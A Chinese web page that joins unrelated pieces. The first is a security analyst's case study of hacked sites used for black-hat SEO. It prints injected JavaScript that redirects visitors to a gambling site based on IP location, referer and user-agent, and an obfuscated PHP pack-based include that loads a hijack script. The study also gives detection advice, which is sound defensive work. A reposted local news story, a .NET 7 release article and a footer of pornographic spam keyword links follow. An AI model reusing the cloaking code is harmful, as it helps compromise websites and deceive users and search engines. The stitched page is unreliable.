整合營銷服務商

          電腦端+手機端+微信端=數(shù)據(jù)同步管理

          免費咨詢熱線:

          真實網(wǎng)站劫持案例分析

          真實網(wǎng)站劫持案例分析

          . 概述

          上段時間一直忙于處理大會安全保障與應急,借助公司云悉情報平臺,發(fā)現(xiàn)并處置幾十起網(wǎng)站被劫持的情況。對黑客SEO技術(shù)頗有感覺。正好這段時間有時間,把以前遇到比較有趣的案例和大家分享一下。里面很多技術(shù)其實早已被玩透,只是網(wǎng)上搜了一下并無太多這方面的介紹。所以在這里共享一下相關(guān)的案例,案例主要分享一下思路。

          1.1 原理

          網(wǎng)站劫持是一個相對古老的技術(shù),主要是黑帽用來做SEO用。實現(xiàn)網(wǎng)站劫持如果以下步驟:

          1. 入侵相關(guān)網(wǎng)站2. 然后在網(wǎng)站中插入JS或修改其配置文件,增加相應的劫持代碼。另外一般會加入判斷條件,判斷條件一般會根據(jù)user-agent或referer進行判斷。大多數(shù)判斷條件會判斷是爬蟲還是人工,如果是人工會返回正常的網(wǎng)站;如果是爬蟲,會返回相關(guān)博彩、娛樂類等黑客設置好的網(wǎng)站3. 人工訪問時,會顯示正常網(wǎng)站。但是爬蟲去訪問時,返回是相關(guān)博彩、娛樂類網(wǎng)站,導致收錄的卻是黑客精心準備好的網(wǎng)站4. 黑帽SEO基本上都是給爬蟲收錄的,對于正常的人工訪問會返回正常的內(nèi)容,所以導致這種網(wǎng)站很難發(fā)現(xiàn)、并且其存留時間相對較長
          1.2 跳轉(zhuǎn)判斷

          下面通過在實際工作中遇到的JS腳本來闡述JS劫持來實現(xiàn)跳轉(zhuǎn)的方法。該JS腳本綜合運用了判斷IP歸屬地、UA、referer來進行跳轉(zhuǎn)判斷。

          1.2.1 判斷IP歸屬地

          判斷遠程IP的歸屬地,如果遠程IP為安徽省或北京,則會直接跳轉(zhuǎn)到http://www.anhui365.net/404.html這個頁面;歸屬地不為安徽或北京的話則會跳轉(zhuǎn)到博彩站點http://m.an888.top/

          var jump_myt=setInterval(function(){
           if(remote_ip_info) {
           clearInterval(jump_myt);
           if(remote_ip_info.province=='安徽' ||remote_ip_info.province=='\u5b89\u5fbd'||remote_ip_info.city=='\u5317\u4eac'||remote_ip_info.city=='北京') {
           window.location.;
           }
           else{
           window.location='http://m.an888.top/'; 
           }
           }

          1.2.2 判斷referer

          若referer關(guān)鍵字為:baidu、google、yahoo、bing、soso、360等搜索引擎爬蟲,當爬蟲去訪問時會調(diào)用browserRedirect()函數(shù)。browserRedirect()函數(shù)主要用來實現(xiàn)跳轉(zhuǎn)判斷。

          function go_bots_url(){
           var init_flag="93989",
           bct=document.referrer,
           bot=['baidu', 'google', 'yahoo', 'bing', 'soso', 'sogou', '360.cn', 'so.com','youdao', 'anquan', 'sm.cn', 'haosou'];
           for (var iin bot) {
           if(bct.indexOf(bot[i]) !=-1) {
           init_flag="1245";
           browserRedirect();
           }
           }
           if(init_flag=="93989"){
           call_init_error();
           }

          1.2.3 判斷user-agent

          如果相應的user-agent匹配關(guān)鍵字ipad、iphone os、midp、ucweb、android等移動端設備時則會跳轉(zhuǎn)到http://m.an888.top/這個博彩站點

          function browserRedirect() { 
           var sUserAgent=navigator.userAgent.toLowerCase(); 
           var bIsIpad=sUserAgent.match(/ipad/i)=="ipad"; 
           varbIsIphoneOs=sUserAgent.match(/iphone os/i)=="iphone os"; 
           var bIsMidp=sUserAgent.match(/midp/i)=="midp"; 
           var bIsUc7=sUserAgent.match(/rv:1.2.3.4/i)=="rv:1.2.3.4"; 
           var bIsUc=sUserAgent.match(/ucweb/i)=="ucweb"; 
           var bIsAndroid=sUserAgent.match(/android/i)=="android"; 
           var bIsCE=sUserAgent.match(/windows ce/i)=="windows ce"; 
           var bIsWM=sUserAgent.match(/windows mobile/i)=="windows mobile"; 
           if (bIsIpad ||bIsIphoneOs || bIsMidp || bIsUc7 || bIsUc || bIsAndroid || bIsCE || bIsWM) { 
           window.location.; 
           } else { 
           window.location='http://m.an888.top/'; 
           } 
          }

          這是一個比較經(jīng)典的JS判斷條件,綜合判斷IP地址、user-agent、referer。黑客入侵相應的網(wǎng)站后只需要把在網(wǎng)站中加入引用的JS相關(guān)網(wǎng)站即可,一般都是直接在相關(guān)調(diào)用頁面,如index.php這種頁面中直接插入下面的代碼

          1.3 表現(xiàn)

          當網(wǎng)站被黑客入侵并作為SEO使用時,一般的表現(xiàn)是通過人工訪問并無法直接打開,需要通過改變?yōu)g覽器的user-agent及referer時才可以重現(xiàn)相應的劫持頁面。頁面被劫持一般表現(xiàn)是下面這樣子的:

          劫持案例-1(植入寄生蟲程序)

          劫持案例-2(插入推廣內(nèi)容)

          劫持案例-3(打開頁面跳轉(zhuǎn)到博彩網(wǎng)站)

          2. 前端劫持案例

          2.1 原理

          前端劫持一般都是在網(wǎng)站的相應頁面中插入JS腳本,通過JS來進行跳轉(zhuǎn)劫持。

          2.2 表現(xiàn)與檢測

          前端劫持的話瀏覽器會執(zhí)行相應的JS腳本,因此我們可以通過抓包來進行檢測相應的JS腳本。可以使用burpsuite、fiddler、wireshark等工具來抓包進行分析與檢測。另外也可以打開相應的頁面分析其源碼來進行判斷,通過源碼找出所有加載的JS腳本,然后再對JS腳本進行分析。

          2.3 案例

          一網(wǎng)站發(fā)現(xiàn)其打開時會跳轉(zhuǎn)到博彩網(wǎng)站,對其源碼進行分析,發(fā)現(xiàn)其頁面被插入一段JS代碼,導致其打開時會跳轉(zhuǎn)到博彩站點。

          3. 服務器端劫持案例

          3.1 原理

          服務器端劫持也稱為后端劫持,其是通過修改網(wǎng)站動態(tài)語言文件,如global.asax、global.asa、conn.asp、conn.php這種文件。這些文件是動態(tài)腳本每次加載時都會加載的配置文件,如訪問x.php時會加載conn.php。這樣的話,只需要修改這些全局的動態(tài)腳本文件(如global.asax),訪問所有的aspx文件時都會加載這個global.asax文件,可以達到全局劫持的效果。

          3.2 表現(xiàn)與檢測

          因為這種文件是在服務器上執(zhí)行的,因此不像前端劫持那樣可以分析加載的惡意JS腳本。其需要在服務器上進行分析。一般檢測都是要檢測全局腳本文件,分析其是否被惡意修改。這種文件一般情況下不會經(jīng)常修改,因此可以使用文件完整性進行檢測。初次配置好了以后生成其MD5或HASH值,并且周期性對比其MD5值是否變化。若變化則進行變化內(nèi)容的分析與檢測。

          3.3 案例

          發(fā)現(xiàn)一政府網(wǎng)站上存在較多博彩類鏈接。但是對其源碼與抓包分析,都沒發(fā)現(xiàn)可疑JS腳本。這樣的話肯定是在服務器端做劫持的。

          于是遠程連接其服務器,其網(wǎng)站使用aspx開發(fā),找到其aspx全局加載的文件global.asax。分析其源碼,發(fā)現(xiàn)存在被修改,增加了爬蟲判斷條件,若為爬蟲訪問,則直接跳轉(zhuǎn)到相應的博彩網(wǎng)站。

          針對服務器端的劫持,找到相應的插入的代碼。直接將其刪除,或者使用備份的文件進行覆蓋。但是這樣并不能真正解決問題,一般情況下global.asax這種文件被修改,基本上說明黑客已經(jīng)入侵到相應服務器。因此需要做全面的應急響應,分析日志、查殺webshll、系統(tǒng)層、應用層全面的安全檢查。找到黑客是如何入侵進來的并且修復相應的漏洞這樣才能真正解決此類問題。

          4. 比較奇葩的服務器劫持案例

          一般情況下,如果是服務器端的劫持通過上面的方法基本上可以找到黑客插入或修改的源碼部分。但是昨天遇到一起比較奇葩的服務器劫持案例。通過源碼與抓包分析判斷黑客是在服務器端做的劫持,但是相應的分析全局文件找了很長時間就是沒有找到黑客在什么地方插入劫持代碼的。

          一政府站使用爬蟲UA打開就是相應的寄生蟲模板,直接分析其index.php文件,發(fā)現(xiàn)其只是調(diào)用了另外一個文件。文件的路徑為:/phpcms/base.php

          找到base.php,由于其源碼比較多。分析其源碼找了好久就是沒有找到劫持所用的代碼,后來經(jīng)同事協(xié)助,花了好長時間才找到黑客進行劫持所有的代碼。base.php其中直接加載了公用的函數(shù)庫,其加載了如下函數(shù):

          @include(PACK(‘H*’,’443A5C7765625C6C79715C75706C6F616466696C655C323031375C303232315C31′));

          Php的pack函數(shù)功能如下:

          @include(PACK(‘H*’,’443A5C7765625C6C79715C75706C6F616466696C655C323031375C303232315C31′));其中:

          H代表16進制

          443A5C7765625C6C79715C75706C6F616466696C655C323031375C303232315C31表示相應的參數(shù),需要將其進行轉(zhuǎn)換。

          轉(zhuǎn)換后,其內(nèi)容為\web\lyq\uploadfile1721,也就是說base.php使用include的Pack函數(shù)調(diào)用了\web\lyq\uploadfile1721這個文件。找到這個文件,分析其源碼,果然找到了黑客用戶進行劫持所調(diào)用的文件。

          這個案例還是比較奇葩的,其實實現(xiàn)方法也是在服務器端進行劫持的,只是其使用函數(shù)來加載相應的劫持腳本。并且這個劫持的腳本放在一個上傳的目錄上,所以導致分析起來中間有些麻煩。針對這種劫持的情況個人感覺相對較好的處置方法就是對關(guān)鍵性的文件,如index.php、global.asax、conn.php等生成基線MD5及HASH值,然后周期性的對比這些文件完整性,如發(fā)現(xiàn)文件完整性發(fā)生變化,將其與基線文件進行比較。分析是否為正常變化。

          目前黑帽做SEO除了上面的外,還有植入JS來挖礦的。不過挖礦在實際工作中只在服務器上遇到被植入挖礦程序,自己并沒有遇到過在網(wǎng)站中植入JS來挖礦。網(wǎng)上看到有遇到過植入JS來進行挖礦的,所以網(wǎng)站頁面代碼中的JS也是網(wǎng)站安全分析的重點。后期云悉情報平臺會加入惡意JS的識別與分析,遇到相關(guān)案例時再和大家分享。

          日,就河南林州農(nóng)民工討薪而引發(fā)的暴力沖突事件,當?shù)卣块T給本網(wǎng)傳來信息稱,所拖欠農(nóng)民工工資已幾乎全額發(fā)放,引發(fā)本起事件的相關(guān)責任人均受到相關(guān)懲處。綠能天然氣公司與林州“二建”的矛盾正在逐步化解。當記者就此結(jié)果向當?shù)刂檎邔で笥∽C時,卻聽到了不同的聲音。是林州“二建”的李志生傾其家產(chǎn)在為農(nóng)民工發(fā)放工資。迄今為止,綠能天然氣公司所欠林州“二建”的70萬元工程款仍遙遙無期。為此,深受其害的李志生傾家蕩產(chǎn),整日精神恍惚,在親人的誤解責罵聲中痛不欲生!

          因為事關(guān)重大,記者對此事再度進行了解,經(jīng)過幾天的明察暗訪,一些不為人知的真相漸漸浮出水面。據(jù)林州當?shù)匕傩辗从常G能天然氣有限公司的實際當家人“徐某”,其麾下有著很多頗有名氣,卻不見有任何經(jīng)營業(yè)績的公司。這些公司的主要功能就是用來融資,然后用融來的資做些見效更快的投資項目。在林州一地可謂是談“徐”色變。徐某本人旗下公司多次因拖欠工程款而發(fā)生糾紛,而每次均能化險為夷,類似于李志生這樣的小包工隊欠款現(xiàn)象更屬司空見慣。采訪中了解到,徐某多處圈占土地,并將以各種名目租來的耕地隨意使用,肆無忌憚地為己所用。本起暴力沖突發(fā)生所在地,即為徐圈占后閑置不用的一處庫房。一旦因經(jīng)濟糾紛發(fā)生了沖突,徐即派遣長期雇傭的社會閑散人員大打出手。然后徐利用其本人特殊的社會地位上下打點,力求自保。久而久之,林州市民聽到徐某后都會膽顫心寒,用徐某本人的話來說,“林州敢動我的人還沒生出來呢,就是在安陽也沒人能奈何得了我!”氣焰之盛,可窺一斑。

          據(jù)林州市宣傳部高某說,最終當?shù)鼐綄⒈酒鸨┝_突定性為“互毆”。可一位現(xiàn)場目擊者反映,事發(fā)當場,首先發(fā)難的人均手持沒有捋掉塑料套的臂力健身棒,而且均是外地口音。而據(jù)另一位討薪者說,我們當時手無寸鐵,可他們卻是手持械具,顯然是有備而來呀,再說了,一個倉庫有卸健身棒的嗎?而且用得著二十多個人嗎?!更多安陽林州姚村鎮(zhèn)的人則說,徐某就是本鎮(zhèn)人,純粹一個“坐地虎”,連他們本家親屬朋友都不愿意搭理。因為徐某本人蠻橫不講理已到了人人驚懼的地步。

          當記者就徐某多處非法圈占土地,并隨意更改土地使用性質(zhì)一節(jié)向林州市委宣傳部高科長尋求合理性答復時,高說要向領導匯報后予以答復。截至記者發(fā)稿時,林州政府官方仍音訊全無。就此事件,記者將作更進一步的落實與報道。本網(wǎng)純屬轉(zhuǎn)載 轉(zhuǎn)載來源http://www.myxxg.net/html/news/view8302.html

          譯 | 朱先忠、諾亞

            日前,微軟推出了.NET 7的生產(chǎn)版本。據(jù)悉,.NET 7基礎設施現(xiàn)在可用于Windows、macOS和Linux,這次版本的更新帶來了性能增強、C#語言升級以及一系列基于容器的云原生開發(fā)功能。

            本次發(fā)行的關(guān)鍵主題包括讓開發(fā)人員能夠編寫高性能的Web API,構(gòu)建云原生應用程序并在Linux上進行部署,還特別強調(diào)提升開發(fā)人員的生產(chǎn)力和項目的容器化支持,以及在GitHub操作中設置CI/CD工作流等等。

            從11月8日起,全球程序員即可從地址(https://dotnet.microsoft.com/en-us/download/dotnet/7.0)處獲取分別針對Windows、Linux和macOS的.NET 7的生產(chǎn)版本。

          截圖@微軟官網(wǎng)

            .Net 7是微軟.Net統(tǒng)一之旅中的第三個主要發(fā)行版本。借助.NET 7,開發(fā)人員可以通過一次性學習一個SDK、一個運行時和一組基礎庫實現(xiàn)技能重用,從而開發(fā)出包括云端、Web、桌面、移動、人工智能和物聯(lián)網(wǎng)等多平臺的各類應用程序。

          性能亮點:更強、更快

            對于C#11語言而言,其目標是使開發(fā)人員能夠編寫更少的代碼。.NET 7在通過對象初始化增強、支持原始字符串字面量和其他功能簡化編碼的同時,實現(xiàn)了泛型數(shù)學等新特性。

            此外,其他亮點還包括:

          • 持續(xù)改進性能。
          • 一個BCL(基礎類庫)。
          • 本機支持ARM64系統(tǒng)。
          • 針對Linux系統(tǒng)的增強的.NET支持。
          • HTTP/3和針對云原生應用程序的最小化打包API的改進。
          • 針對控制臺應用程序的本機AOT(提前編譯:Ahead-of-time compilation)支持。這樣可以生成針對目標平臺的特定文件格式的獨立可執(zhí)行的二進制文件,從而實現(xiàn)快速啟動和小型獨立部署等優(yōu)點。
          • F# 7函數(shù)語言功能繼續(xù)致力于可靠性和對現(xiàn)有特征的支持。

            另外值得注意的是, .NET 7與ASP.NET Core、Entity Framework,以及 .NET MAUI(多平臺應用程序UI)、Windows Forms、Windows Presentation Foundation和用于構(gòu)建分布式應用程序的Orleans 7框架等一起發(fā)行。同時,對于Blazor Web應用程序開發(fā)工具,.NET 7改進了WebAssembly調(diào)試體驗,并支持針對位置改變這種事件的處理。

            其中,.NET MAUI被視為 .NET跨平臺原生UI的未來,于9月初次亮相。但彼時曾有一部分開發(fā)者對此表示不滿,因為他們不相信該技術(shù)已經(jīng)完全成熟。而在.NET 7中,可以看到,.NET MAUI在桌?應?的?持有了進一步改善,對手勢、桌?菜單、?標?持、右鍵菜單、窗體縮放都有了很好的?持。在開發(fā)體驗上.NET MAUI已經(jīng)可以?持iOS 16和Android 13。

            在.NET 7版本正式發(fā)布之前,微軟.NET團隊開發(fā)者Stephen Toub專門就.NET 7的效能改進做了詳細說明。微軟在每個.NET版本都強調(diào)效能改進,因此也有開發(fā)者質(zhì)疑,如果說 .NET 6的效能已經(jīng)提升到一個程度,.NET 7是否還有效能提升的空間。

            對此,Stephen Toub強調(diào):.NET 7的速度“非常快”,Runtime和核心函數(shù)庫加入了1,000個效能相關(guān)的拉取請求,而且在ASP.NET Core、Windows Forms和Entity Framework也有各種改進。他表示,這一版本將是有史以來最快的.NET。他甚至提到,當開發(fā)者被經(jīng)理問到為什么要升級到.NET 7,可以直接回答“.NET 7 is super fast.”

            伴隨著.NET 7的發(fā)行,目前微軟正在發(fā)布Visual Studio 2022 17.4 IDE。Visual Studio 2022為當前的集成開發(fā)環(huán)境引入了64位功能。在此產(chǎn)品發(fā)布之前,.NET 7經(jīng)歷了廣泛的預覽和發(fā)布候選階段。.NET 8很可能會在一年內(nèi)問世,預計將專注類似如現(xiàn)代工作負載、Web API以及更多的有關(guān)無縫云原生開發(fā)這樣的主題。

          .NET 7發(fā)布之后C#有沒有可能超過Java?

            新版本發(fā)布后,知乎論壇出現(xiàn)了這樣一則問題:“.NET 7發(fā)布之后,C#有沒有可能超過Java?”對此,不少開發(fā)者留下了各自的見解。

            觀點1:在國外.NET已經(jīng)足夠繁榮,但國內(nèi),很多人對C#、.NET有很大的偏見。.NET能否吃掉Java的一部分市場依舊有待商榷。從個體角度看,人均薪酬上.NET不如Java,人均就業(yè)機會上.NET大于Java。

          截圖@知乎

            觀點2:從性能上看.NET超越了Java,但是從生態(tài)上來看,Java遠勝.NET,這種局面長期不會有很大改變。

            觀點3:自己覺得好的話就用,不用糾結(jié)超不超過的問題。這些流行語言選哪種學到一定深度, 都碾壓語言差異帶來的優(yōu)勢。

          參考鏈接:

          ?https://www.infoworld.com/article/3679328/microsoft-net-7-makes-its-official-debut.html??

          來源: 51CTO技術(shù)棧


          主站蜘蛛池模板: 精品亚洲一区二区| 国产一区二区在线观看视频| 国产精品无码AV一区二区三区| 精品一区二区三区免费毛片| 福利片福利一区二区三区| 香蕉视频一区二区三区| 一区二区三区视频免费观看| 国产福利一区二区三区在线视频| 日本精品一区二区久久久| 无码人妻精品一区二区三区蜜桃| 一区视频在线播放| 视频精品一区二区三区| 日韩在线视频一区| 国内自拍视频一区二区三区| 亚洲国产成人一区二区精品区| www亚洲精品少妇裸乳一区二区 | 一区二区国产在线观看| 91福利一区二区| 国产精品免费大片一区二区| 精品无码成人片一区二区98 | 国产香蕉一区二区精品视频 | 国产一区二区影院| 国产大秀视频在线一区二区| 日韩A无码AV一区二区三区 | 理论亚洲区美一区二区三区| 骚片AV蜜桃精品一区| 亚洲av高清在线观看一区二区| 综合无码一区二区三区四区五区| 久久国产精品一区二区| 国产天堂一区二区综合| 国产精品一区二区综合| 久久一区二区三区精华液使用方法| 亚洲AV成人一区二区三区AV| 久久一区二区三区99| 国产福利电影一区二区三区,免费久久久久久久精 | 日韩精品一区二区三区在线观看| 国内精品一区二区三区最新| 日本一区二区三区在线看 | 国精产品一区一区三区MBA下载| 亚洲AV无码一区二区三区人| 亚洲国产欧美日韩精品一区二区三区 |